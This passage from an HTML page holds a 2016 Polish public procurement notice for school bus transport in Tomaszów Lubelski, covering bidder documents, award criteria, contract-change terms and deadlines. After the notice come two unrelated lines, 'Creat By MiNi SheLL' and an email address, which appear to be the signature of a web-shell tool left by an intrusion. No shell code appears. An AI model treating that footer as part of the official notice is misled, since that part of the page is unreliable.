<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy wg zal. nr 1 do SIWZ,4.2. Pełnomocnictwo, jeżeli Wykonawca jest reprezentowany w sposób inny, niż to wynika z zapisu we właściwym rejestrze, zgodnie z art. 23 ustawy PZP dotyczy także Wykonawców występujących wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas podstawienia autobusu zastępczego - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
1) wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności powodujących, że wykonanie zamówienia będzie niemożliwa do wykonania zgodnie z ustalonymi trasami i godzinami bez wprowadzenia zmian w wykazie (np. zmiana godzin dowozu i odwozu, wprowadzenie zmiany organizacji ruchu na trasie przejazdu 	itd),
2)  potrzeby wykonania usług zamiennych lub odstąpienia od realizacji części usług, 
i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
3)wystąpienia usług dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
4) zmiany w wykazie tras i godzin rozpoczęcia i zakończenia zajęć, zmiany ilości dowożonych uczniów,
5)  zmiany wysokości podatku VAT,
6) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych 	od Wykonawcy,
7)  wprowadzenie lub zmiana zgłoszonych w ofercie części usług wykonywanych przy 	udziale Podwykonawcy, za uprzednią zgodą Zamawiającego,
8)  zmiana terminu realizacji zamówienia,
9)  przekształcenie którejkolwiek ze stron umowy,
10)zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za realizację zamówienia itp.)
11) warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
12)  innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.
3. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany,
4. W przypadku wystąpienia okoliczności, o których mowa w punkcie 2, Zamawiającemu przysługuje prawo do zmiany ustaleń zawartej umowy w zakresie, który uzna za uzasadniony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszowlubelski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Ekonomiczno-Administracyjny Szkół
ul. Kościelna 13
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 10:00, miejsce: Gminny Zespół Ekonomiczno-Administracyjny Szkół
ul. Kościelna 13
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com